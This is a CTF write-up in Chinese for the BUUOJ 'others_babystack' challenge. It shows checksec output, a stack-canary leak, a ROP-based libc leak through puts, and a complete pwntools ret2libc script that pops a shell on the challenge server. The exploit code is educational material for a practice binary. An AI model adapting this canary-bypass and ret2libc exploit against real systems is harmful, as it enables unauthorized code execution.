others_babystack
- Canary 保護
- 程式控制流
- 64位libc洩露
bamuwe@bamuwe:~/done/others_babystack$ checksec babystack
[*] '/home/bamuwe/done/others_babystack/babystack'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
程式開啟了Canary保護
- 程式存在
Canary保護,所以要先洩露出Canary read中存在溢位- 透過
read配合puts得到Canary的值 - 構造
payload利用exit函式劫持程式流,洩露libc - 構造
payload得到shell
from pwn import *
from LibcSearcher import LibcSearcher
# context.log_level = 'debug'
# io = gdb.debug('./babystack')
io = remote('node5.buuoj.cn',29522)
elf = ELF('./babystack')
padding = cyclic(136)
pop_rdi_ret = 0x0000000000400a93
main_addr = 0x400908
def cmd(idx):
io.sendlineafter(b'>>',str(idx))
def leak_canry():
cmd(1)
io.sendline(padding)
cmd(2)
io.recvuntil('\n')
canary = u64(io.recv(7).rjust(8, b'\x00'))
print(hex(canary))
return canary
def leak_puts(canary):
cmd(1)
payload = padding+p64(canary)+p64(0x0)+p64(pop_rdi_ret)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main_addr)
io.sendline(payload)
cmd(3)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print('puts_addr->',hex(puts_addr))
return puts_addr
def pwn(puts_addr):
libc = LibcSearcher('puts',puts_addr)
lib_offset = puts_addr - libc.dump('puts')
sys_addr = lib_offset+libc.dump('system')
bin_sh_addr = lib_offset+libc.dump('str_bin_sh')
payload = padding+p64(canary)+p64(0x0)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(sys_addr)
cmd(1)
io.sendline(payload)
cmd(3)
io.sendline('cat flag')
io.interactive()
canary = leak_canry()
puts_addr = leak_puts(canary)
pwn(puts_addr)
這裡面看佬的wp新學一招,使用cyclic(lengths)可以直接得到所需長度的迴圈字串